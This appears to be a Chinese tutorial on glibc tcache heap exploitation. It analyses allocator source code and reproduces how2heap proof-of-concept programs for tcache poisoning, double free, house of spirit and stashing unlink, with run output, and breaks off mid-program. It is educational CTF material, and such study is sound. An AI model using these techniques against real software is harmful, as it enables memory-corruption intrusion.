Tcache attack

tcache makes heap exploitation easy again

前言

tcache 是 glibc 2.26 (ubuntu 17.10) 之后引入的一种技术(see commit),目的是提升堆管理的性能。但提升性能的同时舍弃了很多安全检查,也因此有了很多新的利用方式。正如前面说的,2.26 之后加入的 tcache 使得堆的利用更加方便简单了。本文整理自 ctf-wiki 上的知识以及其他大佬的博客。

tcache结构体

tcache 引入了两个新的结构体:tcache_entry 和 tcache_perthread_struct。

这两个结构体和fastbin结构体很像,但是不太一样。

  • tcache_entry
1
2
3
4
5
6
/* We overlay this structure on the user-data portion of a chunk when
the chunk is stored in the per-thread cache. */
typedef struct tcache_entry
{
/* Link to the next entry of the same singly linked list. */
struct tcache_entry *next;
} tcache_entry;

tcache_entry 用于链接空闲的 chunk 结构体,其中的 next 指针指向下一个大小相同的 chunk。

需要注意的是这里的 next 指向 chunk 的 user data,而 fastbin 的 fd 指向 chunk 开头的地址。

而且,tcache_entry 会复用空闲 chunk 的 user data 部分。

  • tcache_perthread_struct
1
2
3
4
5
6
7
8
9
10
11
12
13
14
/* Number of bins in the per-thread cache.  Defined ahead of the struct
   because it is used there as the array bound. */
# define TCACHE_MAX_BINS 64

/* There is one of these for each thread, which contains the
   per-thread cache (hence "tcache_perthread_struct"). Keeping
   overall size low is mildly important. Note that COUNTS and ENTRIES
   are redundant (we could have just counted the linked list each
   time), this is for performance reasons. */
typedef struct tcache_perthread_struct
{
  /* counts[i]: number of entries currently linked in entries[i]. */
  char counts[TCACHE_MAX_BINS];
  /* entries[i]: head of the singly linked list for bin i. */
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

/* Per-thread pointer to the cache; stays NULL until the cache has been
   set up. */
static __thread tcache_perthread_struct *tcache = NULL;

每个 thread 都会维护一个 tcache_perthread_struct,它是整个 tcache 的管理结构,一共有 TCACHE_MAX_BINS 个计数器和 TCACHE_MAX_BINS项 tcache_entry,其中

  • tcache_entry 用单向链表的方式链接了相同大小的处于空闲状态(free 后)的 chunk,这一点上和 fastbin 很像。
  • counts 记录了 tcache_entry 链上空闲 chunk 的数目,每条链上最多可以有 7 个 chunk。

基本工作方式

  • 第一次 malloc 时,会先 malloc 一块内存用来存放 tcache_perthread_struct
  • free 内存,且 size 小于 small bin size 时,tcache 之前会放到 fastbin 或者 unsorted bin 中
  • tcache 后:
    • 先放到对应的 tcache 中,直到 tcache 被填满(默认是 7 个)
    • tcache 被填满之后,再次 free 的内存和之前一样被放到 fastbin 或者 unsorted bin 中
    • tcache 中的 chunk 不会合并(不取消 inuse bit)
  • malloc 内存,且 size 在 tcache 范围内,先从 tcache 取 chunk,直到 tcache 为空
  • tcache 为空后,从 bin 中找
  • tcache 为空时,如果 fastbin/smallbin/unsorted bin 中有 size 符合的 chunk,会先把 fastbin/smallbin/unsorted bin 中的 chunk 放到 tcache 中,直到填满。之后再从 tcache 中取;因此 chunk 在 bin 中和 tcache 中的顺序会反过来

源代码分析

__libc_malloc

第一次 malloc 时,会进入到 MAYBE_INIT_TCACHE ()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
void *
__libc_malloc (size_t bytes)
{
......
......
#if USE_TCACHE
/* int_free also calls request2size, be careful to not pad twice. */
size_t tbytes;
// 根据 malloc 传入的参数计算 chunk 实际大小,并计算 tcache 对应的下标
checked_request2size (bytes, tbytes);
size_t tc_idx = csize2tidx (tbytes);

// 初始化 tcache
MAYBE_INIT_TCACHE ();
DIAG_PUSH_NEEDS_COMMENT;
if (tc_idx < mp_.tcache_bins // 根据 size 得到的 idx 在合法的范围内
/*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
&& tcache
&& tcache->entries[tc_idx] != NULL) // tcache->entries[tc_idx] 有 chunk
{
return tcache_get (tc_idx);
}
DIAG_POP_NEEDS_COMMENT;
#endif
......
......
}

__tcache_init()

其中 MAYBE_INIT_TCACHE () 在 tcache 为空(即第一次 malloc)时调用了 tcache_init(),直接查看 tcache_init()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
/* Allocate the calling thread's tcache_perthread_struct from an arena and
   zero it.  Does nothing when the tcache is shutting down; leaves `tcache`
   untouched when the allocation fails. */
static void
tcache_init(void)
{
  mstate ar_ptr;
  void *victim = 0;
  const size_t bytes = sizeof (tcache_perthread_struct);

  if (tcache_shutting_down)
    return;

  arena_get (ar_ptr, bytes);              /* find a usable arena */
  victim = _int_malloc (ar_ptr, bytes);   /* chunk big enough for the struct */
  if (!victim && ar_ptr != NULL)
    {
      /* First attempt failed: retry once with another arena. */
      ar_ptr = arena_get_retry (ar_ptr, bytes);
      victim = _int_malloc (ar_ptr, bytes);
    }

  if (ar_ptr != NULL)
    __libc_lock_unlock (ar_ptr->mutex);

  /* In a low memory situation, we may not be able to allocate memory
     - in which case, we just keep trying later. However, we
     typically do this very early, so either there is sufficient
     memory, or there isn't enough memory to do non-trivial
     allocations anyway. */
  if (victim)                             /* initialize the tcache */
    {
      tcache = (tcache_perthread_struct *) victim;
      memset (tcache, 0, sizeof (tcache_perthread_struct));
    }
}

tcache_init() 成功返回后,tcache_perthread_struct 就被成功建立了。

申请内存

接下来将进入申请内存的步骤

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
  /* Serve the request straight from the tcache list when possible. */
  if (tc_idx < mp_.tcache_bins            /* idx derived from size is in range */
      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
      && tcache
      && tcache->entries[tc_idx] != NULL) /* this bin's list is not empty */
    {
      return tcache_get (tc_idx);
    }
  DIAG_POP_NEEDS_COMMENT;
#endif
  /* Otherwise continue with a flow similar to the one used without tcache. */
  if (SINGLE_THREAD_P)
    {
      victim = _int_malloc (&main_arena, bytes);
      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
              &main_arena == arena_for_chunk (mem2chunk (victim)));
      return victim;
    }

tcache->entries 不为空时,将进入 tcache_get() 的流程获取 chunk,否则与 tcache 机制前的流程类似,这里主要分析第一种 tcache_get()。这里也可以看出 tcache 的优先级很高,比 fastbin 还要高( fastbin 的申请在没进入 tcache 的流程中)。

tcache_get()

看一下 tcache_get()

1
2
3
4
5
6
7
8
9
10
11
12
/* Caller must ensure that we know tc_idx is valid and there's
available chunks to remove. */
static __always_inline void *
tcache_get (size_t tc_idx)
{
/* Head of the list for this bin; this is the pointer handed back. */
tcache_entry *e = tcache->entries[tc_idx];
assert (tc_idx < TCACHE_MAX_BINS);
assert (tcache->entries[tc_idx] > 0);
/* Unlink the head: e->next becomes the new head without any validation here. */
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]); /* one chunk handed out, so the count drops by one */
return (void *) e;
}

tcache_get() 就是获得 chunk 的过程了。可以看出这个过程还是很简单的,从 tcache->entries[tc_idx] 中获得第一个 chunk,tcache->counts 减一,几乎没有任何保护。

__libc_free()

看完申请,再看看有 tcache 时的释放

1
2
3
4
5
6
7
8
9
void
__libc_free (void *mem)
{
......
......
MAYBE_INIT_TCACHE ();
ar_ptr = arena_for_chunk (p);
_int_free (ar_ptr, p, 0);
}

__libc_free() 没有太多变化,MAYBE_INIT_TCACHE () 在 tcache 不为空时失去了作用。

_int_free()

跟进 _int_free()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
......
......
#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);
if (tcache
&& tc_idx < mp_.tcache_bins // 64
&& tcache->counts[tc_idx] < mp_.tcache_count) // 7
{
tcache_put (p, tc_idx);
return;
}
}
#endif
......
......

判断 tc_idx 合法,tcache->counts[tc_idx] 在 7 个以内时,就进入 tcache_put(),传递的两个参数是要释放的 chunk 和该 chunk 对应的 size 在 tcache 中的下标。

tcache_put()

1
2
3
4
5
6
7
8
9
10
11
/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
/* The entry overlays the chunk's user-data area (chunk2mem). */
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
/* Push onto the front of the bin's list; nothing here checks whether e is already linked. */
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}

tcache_put() 完成了把释放的 chunk 插入到 tcache->entries[tc_idx] 链表头部的操作,也几乎没有任何保护。并且没有把 P 位(PREV_INUSE)置零。

Tcache Usage

  • 内存释放:

可以看到,在 free 函数的最先处理部分,首先检查释放块的指针是否对齐、size 是否合法(不小于 MINSIZE 且满足对齐),随后便优先放入 tcache 结构中,此时并不检查前后堆块的状态。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
_int_free (mstate av, mchunkptr p, int have_lock)
{
INTERNAL_SIZE_T size; /* its size */
mfastbinptr *fb; /* associated fastbin */
mchunkptr nextchunk; /* next contiguous chunk */
INTERNAL_SIZE_T nextsize; /* its size */
int nextinuse; /* true if nextchunk is used */
INTERNAL_SIZE_T prevsize; /* size of previous contiguous chunk */
mchunkptr bck; /* misc temp for linking */
mchunkptr fwd; /* misc temp for linking */

size = chunksize (p);

/* Little security check which won't hurt performance: the
allocator never wrapps around at the end of the address space.
Therefore we can exclude some size values which might appear
here by accident or by "design" from some intruder. */
if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
|| __builtin_expect (misaligned_chunk (p), 0))
malloc_printerr ("free(): invalid pointer");
/* We know that each chunk is at least MINSIZE bytes in size or a
multiple of MALLOC_ALIGNMENT. */
if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
malloc_printerr ("free(): invalid size");

check_inuse_chunk(av, p);

#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);

if (tcache
&& tc_idx < mp_.tcache_bins
&& tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (p, tc_idx);
return;
}
}
#endif

......
}
  • 内存申请:

在内存分配的 malloc 函数中有多处,会将内存块移入 tcache 中。

(1)首先,申请的内存块符合 fastbin 大小时并且在 fastbin 内找到可用的空闲块时,会把该 fastbin 链上的其他内存块放入 tcache 中。

(2)其次,申请的内存块符合 smallbin 大小时并且在 smallbin 内找到可用的空闲块时,会把该 smallbin 链上的其他内存块放入 tcache 中。

(3)当在 unsorted bin 链上循环处理时,当找到大小合适的块时,并不直接返回,而是先放到 tcache 中,继续处理。

代码太长就不全贴了,贴个符合 fastbin 的时候

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
{
idx = fastbin_index (nb);
mfastbinptr *fb = &fastbin (av, idx);
mchunkptr pp;
victim = *fb;

if (victim != NULL)
{
if (SINGLE_THREAD_P)
*fb = victim->fd;
else
REMOVE_FB (fb, pp, victim);
if (__glibc_likely (victim != NULL))
{
size_t victim_idx = fastbin_index (chunksize (victim));
if (__builtin_expect (victim_idx != idx, 0))
malloc_printerr ("malloc(): memory corruption (fast)");
check_remalloced_chunk (av, victim, nb);
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;

/* While bin not empty and tcache not full, copy chunks. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = *fb) != NULL)
{
if (SINGLE_THREAD_P)
*fb = tc_victim->fd;
else
{
REMOVE_FB (fb, pp, tc_victim);
if (__glibc_unlikely (tc_victim == NULL))
break;
}
tcache_put (tc_victim, tc_idx);
}
}
#endif
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
}
}
  • tcache 取出:在内存申请的开始部分,首先会判断申请大小块,在 tcache 是否存在,如果存在就直接从 tcache 中摘取,否则再使用_int_malloc 分配。
  • 在循环处理 unsorted bin 内存块时,如果已处理的块数超过上限 mp_.tcache_unsorted_limit,且此前已有块被放入 tcache(return_cached 为真),会立即从 tcache 中取出一个并返回。该上限默认是 0,即不存在上限。
1
2
3
4
5
6
7
8
9
10
11
#if USE_TCACHE
/* If we've processed as many chunks as we're allowed while
filling the cache, return one of the cached ones. */
++tcache_unsorted_count;
if (return_cached
&& mp_.tcache_unsorted_limit > 0
&& tcache_unsorted_count > mp_.tcache_unsorted_limit)
{
return tcache_get (tc_idx);
}
#endif
  • 在循环处理 unsorted bin 内存块后,如果之前曾放入过 tcache 块,则会取出一个并返回。
1
2
3
4
5
6
7
#if USE_TCACHE
/* If all the small chunks we found ended up cached, return one now. */
if (return_cached)
{
return tcache_get (tc_idx);
}
#endif

Pwn Tcache

tcache poisoning

通过覆盖 tcache 中的 next,不需要伪造任何 chunk 结构即可实现 malloc 到任何地址。

以 how2heap 中的 tcache_poisoning 为例

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <assert.h>

/* tcache poisoning demo: free two chunks, overwrite the next pointer of the
   list head with the address of a stack variable, then malloc twice so the
   second malloc returns that stack address. */
int main()
{
    // disable buffering
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);

    printf("This file demonstrates a simple tcache poisoning attack by tricking malloc into\n"
           "returning a pointer to an arbitrary location (in this case, the stack).\n"
           "The attack is very similar to fastbin corruption attack.\n");
    printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f,\n"
           "We have to create and free one more chunk for padding before fd pointer hijacking.\n\n");

    /* Only the address of stack_var is used; its value is never read. */
    size_t stack_var;
    printf("The address we want malloc() to return is %p.\n", (void *)&stack_var);

    printf("Allocating 2 buffers.\n");
    intptr_t *a = malloc(128);
    printf("malloc(128): %p\n", (void *)a);
    intptr_t *b = malloc(128);
    printf("malloc(128): %p\n", (void *)b);

    printf("Freeing the buffers...\n");
    free(a);
    free(b);

    /* %p requires a void * argument and sizeof yields a size_t (%zu). */
    printf("Now the tcache list has [ %p -> %p ].\n", (void *)b, (void *)a);
    printf("We overwrite the first %zu bytes (fd/next pointer) of the data at %p\n"
           "to point to the location to control (%p).\n", sizeof(intptr_t), (void *)b, (void *)&stack_var);
    /* Deliberate write-after-free: b[0] overlays the freed entry's next pointer. */
    b[0] = (intptr_t)&stack_var;
    printf("Now the tcache list has [ %p -> %p ].\n", (void *)b, (void *)&stack_var);

    printf("1st malloc(128): %p\n", malloc(128));
    printf("Now the tcache list has [ %p ].\n", (void *)&stack_var);

    intptr_t *c = malloc(128);
    printf("2nd malloc(128): %p\n", (void *)c);
    printf("We got the control\n");

    assert((long)&stack_var == (long)c);
    return 0;
}

运行结果是

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@74f21669baa4:/ctf/work/how2heap/glibc_2.27 # ./tcache_poisoning                   
This file demonstrates a simple tcache poisoning attack by tricking malloc into
returning a pointer to an arbitrary location (in this case, the stack).
The attack is very similar to fastbin corruption attack.
After the patch https://sourceware.org/git/?p=glibc.git;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f,
We have to create and free one more chunk for padding before fd pointer hijacking.
The address we want malloc() to return is 0x7ffddb503088.
Allocating 2 buffers.
malloc(128): 0x56460ae042a0
malloc(128): 0x56460ae04330
Freeing the buffers...
Now the tcache list has [ 0x56460ae04330 -> 0x56460ae042a0 ].
We overwrite the first 8 bytes (fd/next pointer) of the data at 0x56460ae04330
to point to the location to control (0x7ffddb503088).
Now the tcache list has [ 0x56460ae04330 -> 0x7ffddb503088 ].
1st malloc(128): 0x56460ae04330
Now the tcache list has [ 0x7ffddb503088 ].
2nd malloc(128): 0x7ffddb503088
We got the control

tcache dup

类似 fastbin dup,不过利用的是 tcache_put() 的不严谨,再看一遍tcache_put的源代码

1
2
3
4
5
6
7
8
9
/* Push CHUNK onto the front of the tcache list selected by TC_IDX. */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
/* No test for e already being the list head, so freeing the same chunk twice links it to itself. */
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}

可以看出,tcache_put() 的检查也可以忽略不计(甚至没有对 tcache->counts[tc_idx] 的检查),大幅提高性能的同时安全性也下降了很多。

因为没有任何检查,所以我们可以对同一个 chunk 多次 free,造成 cyclic list(环形链表)。

以 how2heap 的 tcache_dup 为例分析,源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <stdio.h>                                                                     
#include <stdlib.h>
#include <assert.h>
/* tcache double-free demo: the same chunk is freed twice, so the next two
   allocations of that size return the same pointer. */
int main()
{
    printf("This file demonstrates a simple double-free attack with tcache.\n");
    printf("Allocating buffer.\n");
    int *a = malloc(8);
    /* %p requires a void * argument. */
    printf("malloc(8): %p\n", (void *)a);
    printf("Freeing twice...\n");
    /* Deliberate double free: this is the behaviour being demonstrated. */
    free(a);
    free(a);
    printf("Now the free list has [ %p, %p ].\n", (void *)a, (void *)a);
    void *b = malloc(8);
    void *c = malloc(8);
    printf("Next allocated buffers will be same: [ %p, %p ].\n", b, c);
    assert((long)b == (long)c);
    return 0;
}

因为 tcache_put 的检测不完善,所以很容易就能 double free,但是在之后较新版本的 libc 中添加了针对 tcache double free 的 check:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
index 6d7a6a8..f730d7a 100644 (file)
--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -2967,6 +2967,8 @@ mremap_chunk (mchunkptr p, size_t new_size)
typedef struct tcache_entry
{
struct tcache_entry *next;
+ /* This field exists to detect double frees. */
+ struct tcache_perthread_struct *key;
} tcache_entry;

/* There is one of these for each thread, which contains the
@@ -2990,6 +2992,11 @@ tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
+
+ /* Mark this chunk as "in the tcache" so the test in _int_free will
+ detect a double free. */
+ e->key = tcache;
+
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
@@ -3005,6 +3012,7 @@ tcache_get (size_t tc_idx)
assert (tcache->entries[tc_idx] > 0);
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]);
+ e->key = NULL;
return (void *) e;
}

@@ -4218,6 +4226,26 @@ _int_free (mstate av, mchunkptr p, int have_lock)
{
size_t tc_idx = csize2tidx (size);

+ /* Check to see if it's already in the tcache. */
+ tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+ /* This test succeeds on double free. However, we don't 100%
+ trust it (it also matches random payload data at a 1 in
+ 2^<size_t> chance), so verify it's not an unlikely coincidence
+ before aborting. */
+ if (__glibc_unlikely (e->key == tcache && tcache))
+ {
+ tcache_entry *tmp;
+ LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+ for (tmp = tcache->entries[tc_idx];
+ tmp;
+ tmp = tmp->next)
+ if (tmp == e)
+ malloc_printerr ("free(): double free detected in tcache 2");
+ /* If we get here, it was a coincidence. We've wasted a few
+ cycles, but don't abort. */
+ }
+
if (tcache
&& tc_idx < mp_.tcache_bins
&& tcache->counts[tc_idx] < mp_.tcache_count)

目前为止,只看到了在 free 操作的时候的 check ,似乎没有对 get 进行新的 check。

tcache perthread corruption

我们已经知道 tcache_perthread_struct 是整个 tcache 的管理结构,如果能控制这个结构体,那么无论我们 malloc 的 size 是多少,地址都是可控的。

这里没找到太好的例子,自己想了一种情况

设想有如下的堆排布情况

1
2
3
4
5
6
7
8
9
10
11
12
tcache_    +------------+
\perthread |...... |
\_struct +------------+
|counts[i] |
+------------+
|...... | +----------+
+------------+ |header |
|entries[i] |--------->+----------+
+------------+ |NULL |
|...... | +----------+
| | | |
+------------+ +----------+

通过一些手段(如 tcache poisoning),我们将其改为了

1
2
3
4
5
6
7
8
9
10
11
12
tcache_    +------------+<---------------------------+
\perthread |...... | |
\_struct +------------+ |
|counts[i] | |
+------------+ |
|...... | +----------+ |
+------------+ |header | |
|entries[i] |--------->+----------+ |
+------------+ |target |------+
|...... | +----------+
| | | |
+------------+ +----------+

这样,两次 malloc 后我们就返回了 tcache_perthread_struct 的地址,就可以控制整个 tcache 了。

因为 tcache_perthread_struct 也在堆上,因此这种方法一般只需要 partial overwrite 就可以达到目的。

tcache house of spirit

拿 how2heap 的源码来讲:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#include <stdio.h>
#include <stdlib.h>

/* tcache house-of-spirit demo: build a fake chunk header on the stack, free
   a pointer into it, and let the next malloc of the matching size return
   that stack region. */
int main()
{
    fprintf(stderr, "This file demonstrates the house of spirit attack on tcache.\n");
    fprintf(stderr, "It works in a similar way to original house of spirit but you don't need to create fake chunk after the fake chunk that will be freed.\n");
    fprintf(stderr, "You can see this in malloc.c in function _int_free that tcache_put is called without checking if next chunk's size and prev_inuse are sane.\n");
    fprintf(stderr, "(Search for strings \"invalid next size\" and \"double free or corruption\")\n\n");

    fprintf(stderr, "Ok. Let's start with the example!.\n\n");


    fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
    malloc(1);

    fprintf(stderr, "Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n");
    unsigned long long *a; //pointer that will be overwritten
    /* The fake chunk must be 16-byte aligned (see the message printed below);
       a plain unsigned long long array is only guaranteed 8-byte alignment,
       so request the alignment explicitly instead of relying on stack layout. */
    unsigned long long fake_chunks[10] __attribute__ ((aligned (0x10))); //fake chunk region

    fprintf(stderr, "This region contains one fake chunk. It's size field is placed at %p\n", (void *)&fake_chunks[1]);

    fprintf(stderr, "This chunk size has to be falling into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
    fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
    fake_chunks[1] = 0x40; // this is the size


    fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", (void *)&fake_chunks[1]);
    fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");

    /* User-data pointer of the fake chunk: the size field sits just before it. */
    a = &fake_chunks[2];

    fprintf(stderr, "Freeing the overwritten pointer.\n");
    free(a);

    fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", (void *)&fake_chunks[1], (void *)&fake_chunks[2]);
    fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
}

这个攻击的目的是控制栈上的内容:先 malloc 一块 chunk 完成堆的初始化,然后在栈上伪造一个 fake chunk 并把它 free 掉,之后我们会发现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
gdb-peda$ heapinfo
(0x20) fastbin[0]: 0x0
(0x30) fastbin[1]: 0x0
(0x40) fastbin[2]: 0x0
(0x50) fastbin[3]: 0x0
(0x60) fastbin[4]: 0x0
(0x70) fastbin[5]: 0x0
(0x80) fastbin[6]: 0x0
(0x90) fastbin[7]: 0x0
(0xa0) fastbin[8]: 0x0
(0xb0) fastbin[9]: 0x0
top: 0x4052e0 (size : 0x20d20)
last_remainder: 0x0 (size : 0x0)
unsortbin: 0x0
(0x90) tcache_entry[7]: 0x7fffffffe510 --> 0x401340

Tcache 里就存放了一块 栈上的内容,我们之后只需 malloc,就可以控制这块内存。

在 smallbin 中包含有空闲块的时候,会同时将同大小的其他空闲块,放入 tcache 中,此时也会出现解链操作,但相比于 unlink 宏,缺少了链完整性校验。因此,原本 unlink 操作在该条件下也可以使用。

这种攻击利用的是 tcache bin 有剩余 (数量小于 mp_.tcache_count,默认为 7) 时,同大小的 small bin 会放进 tcache 中 (这种情况可以用 calloc 分配同大小堆块触发,因为 calloc 分配堆块时不从 tcache bin 中选取)。在获取到 smallbin 中的一个 chunk 后,如果 tcache 仍有足够空闲位置,会将剩余的 small bin 链入 tcache ,在这个过程中只对第一个 bin 进行了完整性检查,后面的堆块的检查缺失。当攻击者可以写一个 small bin 的 bk 指针时,其可以在任意地址上写一个 libc 地址 (类似 unsorted bin attack 的效果)。构造得当的情况下也可以分配 fake chunk 到任意地址。

这里以 how2heap 中的 tcache_stashing_unlink_attack.c 为例。

我们按照释放的先后顺序称 smallbin[sz] 中的两个 chunk 分别为 chunk0 和 chunk1。我们修改 chunk1 的 bk 为 fake_chunk_addr。同时还要在 fake_chunk_addr->bk 处提前写一个可写地址 writable_addr 。调用 calloc(size-0x10) 的时候会返回给用户 chunk0 (这是因为 smallbin 的 FIFO 分配机制),假设 tcache[sz] 中有 5 个空闲堆块,则有足够的位置容纳 chunk1 以及 fake_chunk 。在源码的检查中,只对第一个 chunk 的链表完整性做了检测 __glibc_unlikely (bck->fd != victim) ,后续堆块在放入过程中并没有检测。

因为 tcache 的分配机制是 LIFO ,所以位于 chunk1->bk 指针处的 fake_chunk 在链入 tcache 的时候反而会放到链表表头。在下一次调用 malloc(sz-0x10) 时会返回 fake_chunk+0x10 给用户,同时,由于 bin->bk = bck;bck->fd = bin; 的 unlink 操作,会使得 writable_addr+0x10 处被写入一个 libc 地址。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#include <stdio.h>
#include <stdlib.h>

/* tcache stashing unlink demo: arrange 5 chunks in the 0xa0 tcache bin and 2 in
   the matching small bin, corrupt the bk pointer of one small-bin chunk so it
   points at stack_var, then call calloc so the remaining small-bin entries
   (including the fake one) are moved into the tcache. */
int main(){
unsigned long stack_var[0x10] = {0};
unsigned long *chunk_lis[0x10] = {0};
unsigned long *target;

fprintf(stderr, "This file demonstrates the stashing unlink attack on tcache.\n\n");
fprintf(stderr, "This poc has been tested on both glibc 2.27 and glibc 2.29.\n\n");
fprintf(stderr, "This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\n\n");
fprintf(stderr, "The mechanism of putting smallbin into tcache in glibc gives us a chance to launch the attack.\n\n");
fprintf(stderr, "This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we'll create the chunk on the stack.\n\n");

// stack_var emulate the fake_chunk we want to alloc to
fprintf(stderr, "Stack_var emulates the fake chunk we want to alloc to.\n\n");
fprintf(stderr, "First let's write a writeable address to fake_chunk->bk to bypass bck->fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk->bk + 0x10) which is stack_var[4] will be a libc addr after attack.\n\n");

/* stack_var[3] plays the role of fake_chunk->bk; it must hold a writable address. */
stack_var[3] = (unsigned long)(&stack_var[2]);

fprintf(stderr, "You can see the value of fake_chunk->bk is:%p\n\n",(void*)stack_var[3]);
fprintf(stderr, "Also, let's see the initial value of stack_var[4]:%p\n\n",(void*)stack_var[4]);
fprintf(stderr, "Now we alloc 9 chunks with malloc.\n\n");

//now we malloc 9 chunks
for(int i = 0;i < 9;i++){
chunk_lis[i] = (unsigned long*)malloc(0x90);
}

//put 7 tcache
fprintf(stderr, "Then we free 7 of them in order to put them into tcache. Carefully we didn't free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\n\n");

/* This loop frees chunk3..chunk8 (six chunks); chunk1, freed below, is the seventh. */
for(int i = 3;i < 9;i++){
free(chunk_lis[i]);
}

fprintf(stderr, "As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\n\n");

//last tcache bin
free(chunk_lis[1]);
//now they are put into unsorted bin
free(chunk_lis[0]);
free(chunk_lis[2]);

//convert into small bin
fprintf(stderr, "Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\n\n");

malloc(0xa0);//>0x90

//now 5 tcache bins
fprintf(stderr, "Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\n\n");

malloc(0x90);
malloc(0x90);

fprintf(stderr, "Now we emulate a vulnerability that can overwrite the victim->bk pointer into fake_chunk addr: %p.\n\n",(void*)stack_var);

//change victim->bck
/*VULNERABILITY*/
/* Deliberate write into the already-freed chunk2: index 1 of its user data is the bk field. */
chunk_lis[2][1] = (unsigned long)stack_var;
/*VULNERABILITY*/

//trigger the attack
fprintf(stderr, "Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\n\n");

calloc(1,0x90);

